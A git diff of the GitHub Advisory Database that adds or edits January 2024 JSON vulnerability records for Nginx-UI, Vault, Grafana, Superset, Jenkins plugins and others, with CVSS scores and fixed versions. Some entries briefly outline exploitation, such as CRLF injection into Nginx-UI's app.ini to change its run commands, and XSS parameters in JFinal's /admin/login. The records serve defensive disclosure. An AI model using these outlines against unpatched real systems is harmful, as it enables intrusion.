a/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json b/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json index 86250f0d94aa3..e992b2e1f7cf3 100644 --- a/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json +++ b/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json @@ -55,6 +55,10 @@ { "type": "PACKAGE", "url": "https://github.com/pyload/pyload" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json b/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json new file mode 100644 index 0000000000000..5ce7efee9eef3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcjq-7f7v-pvc8", + "modified": "2024-01-29T22:30:24Z", + "published": "2024-01-29T22:30:24Z", + "aliases": [ + "CVE-2024-23828" + ], + "summary": "Nginx-UI vulnerable to authenticated RCE through injecting into the application config via CRLF", + "details": "### Summary\n\nFix bypass to the following bugs\n\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35\n\nAllowing to inject directly in the `app.ini` via CRLF to change the value of `test_config_cmd` and `start_cmd` resulting in an Authenticated RCE\n\n### Impact\nAuthenticated Remote execution on the host", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/0xJacky/Nginx-UI" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.0-beta.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23828" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/commit/d70e37c8575e25b3da7203ff06da5e16c77a42d1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/0xJacky/nginx-ui" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:24Z", + "nvd_published_at": "2024-01-29T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json b/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json index eb399e27f3ea7..5cc04c06a062d 100644 --- a/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json +++ b/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qh2w-9m7w-hjg2", - "modified": "2024-01-24T14:22:02Z", + "modified": "2024-01-29T19:12:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2024-22497" @@ -9,7 +9,10 @@ "summary": "Cross-site Scripting in JFinal", "details": "Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json b/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json new file mode 100644 index 0000000000000..7746ba728b323 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhjf-hm5j-335w", + "modified": "2024-01-30T20:57:28Z", + "published": "2024-01-30T20:57:28Z", + "aliases": [ + "CVE-2024-24556" + ], + "summary": "@urql/next Cross-site Scripting vulnerability", + "details": "## impact\n\nThe `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream.\n\nTo fix this vulnerability upgrade to version 1.1.1", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@urql/next" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24556" + }, + { + "type": "WEB", + "url": "https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urql-graphql/urql" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:28Z", + "nvd_published_at": "2024-01-30T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json b/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json index 3499af50be6d7..f3a63728f380e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json +++ b/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qjpf-2jhx-3758", - "modified": "2024-01-24T21:51:30Z", + "modified": "2024-01-29T21:53:55Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23904" @@ -9,7 +9,10 @@ "summary": "Arbitrary file read vulnerability in Jenkins Log Command Plugin", "details": "Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json b/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json index 1146333d53075..e671985fd6532 100644 --- a/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json +++ b/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qm2j-qvq3-j29v", - "modified": "2024-01-23T19:00:41Z", + "modified": "2024-01-29T14:22:10Z", "published": "2024-01-23T12:49:27Z", "aliases": [ "CVE-2023-48714" ], "summary": "Record titles for restricted records can be viewed if exposed by GridFieldAddExistingAutocompleter", - "details": "### Impact\nIf a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user.\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-48714\n", + "details": "### Impact\nIf a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user.\n\n**Base CVSS:** [4.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Nick K - LittleMonkey, [littlemonkey.co.nz](http://littlemonkey.co.nz/)\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-48714\n", "severity": [ { "type": "CVSS_V3", @@ -78,7 +78,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-200" + "CWE-200", + "CWE-732" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json b/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json new file mode 100644 index 0000000000000..92d7bfbe8a4d8 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrqr-3x5j-2xw9", + "modified": "2024-01-31T23:28:22Z", + "published": "2024-01-31T23:28:22Z", + "aliases": [ + "CVE-2018-12608" + ], + "summary": "Docker Moby Authentication Bypass", + "details": "An issue was discovered in Docker Moby before 17.06.0. The Docker engine validated a client TLS certificate using both the configured client CA root certificate and all system roots on non-Windows systems. This allowed a client with any domain validated certificate signed by a system-trusted root CA (as opposed to one signed by the configured CA root certificate) to authenticate.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "17.06.0-ce" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12608" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/issues/33173" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/pull/33182" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/190c6e8cf8b893874a33d83f78307f1bed0bfbcd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:28:22Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json b/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json new file mode 100644 index 0000000000000..eb444aae6feff --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8xp-52mq-rmm8", + "modified": "2024-01-31T22:43:05Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2023-44312" + ], + "summary": "Apache ServiceComb Service-Center Exposure of Sensitive Information to an Unauthorized Actor vulnerability", + "details": "Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center. This issue affects Apache ServiceComb Service-Center before 2.1.0 (included). Users are recommended to upgrade to version 2.2.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/apache/servicecomb-service-center" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44312" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/servicecomb-service-center" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/dkvlgnrmc17qzjdy9k0cr60wpzcssk1s" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:05Z", + "nvd_published_at": "2024-01-31T09:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json b/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json new file mode 100644 index 0000000000000..2720d70c87105 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjmv-52mp-gjrr", + "modified": "2024-01-30T20:56:50Z", + "published": "2024-01-30T20:56:50Z", + "aliases": [ + "CVE-2024-22193" + ], + "summary": "vantage6 may create unencrypted tasks in encrypted collaboration", + "details": "### Impact\nThere are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database.\n\n### Workarounds\nThis is not an issue with the normal workflow, only if e.g. a user with the python client sets encryption to the wrong value.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22193" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-922" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:50Z", + "nvd_published_at": "2024-01-30T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json b/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json new file mode 100644 index 0000000000000..bb28b862a4cc1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpgp-9hmg-j25x", + "modified": "2024-01-31T23:11:40Z", + "published": "2024-01-31T23:11:40Z", + "aliases": [ + "CVE-2020-35177" + ], + "summary": "Enumeration of users in HashiCorp Vault", + "details": "HashiCorp Vault and Vault Enterprise allowed the enumeration of users via the LDAP auth method. Fixed in 1.5.6 and 1.6.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:U/RL:O/RC:R" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35177" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/pull/10537" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2020-25-vault-s-ldap-auth-method-allows-user-enumeration/18984" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#161" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:40Z", + "nvd_published_at": "2020-12-17T05:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json b/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json new file mode 100644 index 0000000000000..ce36a1891c86c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq95-xf66-j689", + "modified": "2024-01-31T23:22:08Z", + "published": "2024-01-31T23:22:08Z", + "aliases": [ + "CVE-2021-3282" + ], + "summary": "Improper Authentication in HashiCorp Vault", + "details": "HashiCorp Vault Enterprise 1.6.0 & 1.6.1 allowed the `remove-peer` raft operator command to be executed against DR secondaries without authentication. Fixed in 1.6.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3282" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/09f9068e22f762da123160233518b440e00bdb3b" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2021-04-vault-enterprise-s-dr-secondaries-allowed-raft-peer-removal-without-authentication/20337" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202207-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:22:08Z", + "nvd_published_at": "2021-02-01T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json b/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json new file mode 100644 index 0000000000000..83f23c9b807d5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv8p-rr2h-fgpg", + "modified": "2024-01-30T20:57:45Z", + "published": "2024-01-30T20:57:45Z", + "aliases": [ + "CVE-2024-23841" + ], + "summary": "@apollo/experimental-nextjs-app-support Cross-site Scripting vulnerability", + "details": "### Impact\n\nThe @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. This vulnerability arises from improper handling of untrusted input when @apollo/experimental-apollo-client-nextjs performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.\n\n### Patches\n\nTo fix this issue, please update to version 0.7.0 or later.\n\n### Workarounds\n\nThere are no known workarounds for this issue. Please update to version 0.7.0\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@apollo/experimental-nextjs-app-support" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.6.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23841" + }, + { + "type": "WEB", + "url": "https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apollographql/apollo-client-nextjs" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:45Z", + "nvd_published_at": "2024-01-30T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json b/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json index e02eb7065b78a..78dd3517ed592 100644 --- a/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json +++ b/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-rwhh-6x83-84v6", - "modified": "2024-01-23T21:35:07Z", + "modified": "2024-01-29T19:12:33Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2023-49657" ], "summary": "Cross-site Scripting in Apache superset", - "details": "A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.\n\nFor 2.X versions, users should change their config to include:\n\nTALISMAN_CONFIG = {\n    \"content_security_policy\": {\n        \"base-uri\": [\"'self'\"],\n        \"default-src\": [\"'self'\"],\n        \"img-src\": [\"'self'\", \"blob:\", \"data:\"],\n        \"worker-src\": [\"'self'\", \"blob:\"],\n        \"connect-src\": [\n            \"'self'\",\n            \" https://api.mapbox.com\" https://api.mapbox.com\" ;,\n            \" https://events.mapbox.com\" https://events.mapbox.com\" ;,\n        ],\n        \"object-src\": \"'none'\",\n        \"style-src\": [\n            \"'self'\",\n            \"'unsafe-inline'\",\n        ],\n        \"script-src\": [\"'self'\", \"'strict-dynamic'\"],\n    },\n    \"content_security_policy_nonce_in\": [\"script-src\"],\n    \"force_https\": False,\n    \"session_cookie_secure\": False,\n}\n\n", + "details": "A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.\n\nFor 2.X versions, users should change their config to include:\n\nTALISMAN_CONFIG = {\n    \"content_security_policy\": {\n        \"base-uri\": [\"'self'\"],\n        \"default-src\": [\"'self'\"],\n        \"img-src\": [\"'self'\", \"blob:\", \"data:\"],\n        \"worker-src\": [\"'self'\", \"blob:\"],\n        \"connect-src\": [\n            \"'self'\",\n            \" https://api.mapbox.com\" https://api.mapbox.com\" ;,\n            \" https://events.mapbox.com\" https://events.mapbox.com\" ;,\n        ],\n        \"object-src\": \"'none'\",\n        \"style-src\": [\n            \"'self'\",\n            \"'unsafe-inline'\",\n        ],\n        \"script-src\": [\"'self'\", \"'strict-dynamic'\"],\n    },\n    \"content_security_policy_nonce_in\": [\"script-src\"],\n    \"force_https\": False,\n    \"session_cookie_secure\": False,\n}", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json b/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json index 67445803e2bd4..187291619c777 100644 --- a/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json +++ b/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json @@ -59,6 +59,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-401", "CWE-770" ], "severity": "MODERATE", diff --git a/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json b/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json index e4c52f7f7d38a..ee4188e23098f 100644 --- a/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json +++ b/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v435-pfj6-68r3", - "modified": "2024-01-23T20:11:19Z", + "modified": "2024-01-29T19:12:43Z", "published": "2024-01-23T18:31:11Z", "aliases": [ "CVE-2024-22496" @@ -9,7 +9,10 @@ "summary": "Cross-site Scripting in JFinal", "details": "Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json b/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json index cb20fa9ee9d1a..7b136805771f6 100644 --- a/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json +++ b/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json @@ -92,6 +92,10 @@ { "type": "PACKAGE", "url": "https://github.com/nautobot/nautobot" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/nautobot/PYSEC-2024-16.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json b/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json new file mode 100644 index 0000000000000..096f188bb86ea --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5gq-qvjq-8p53", + "modified": "2024-01-31T23:28:40Z", + "published": "2024-01-31T23:28:40Z", + "aliases": [ + "CVE-2018-12099" + ], + "summary": "Grafana Cross-site Scripting (XSS)", + "details": "Grafana before 5.2.0-beta1 has XSS vulnerabilities in dashboard links.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12099" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v5.2.0-beta1" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20190416-0004/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:28:40Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json b/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json new file mode 100644 index 0000000000000..d53cf9d7101d2 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v89q-c273-3p42", + "modified": "2024-02-05T23:06:29Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-36259" + ], + "summary": "Craft CMS Audit Plugin Cross Site Scripting vulnerability", + "details": "Cross Site Scripting (XSS) vulnerability in Craft CMS Audit Plugin before version 3.0.2 allows attackers to execute arbitrary code during user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": 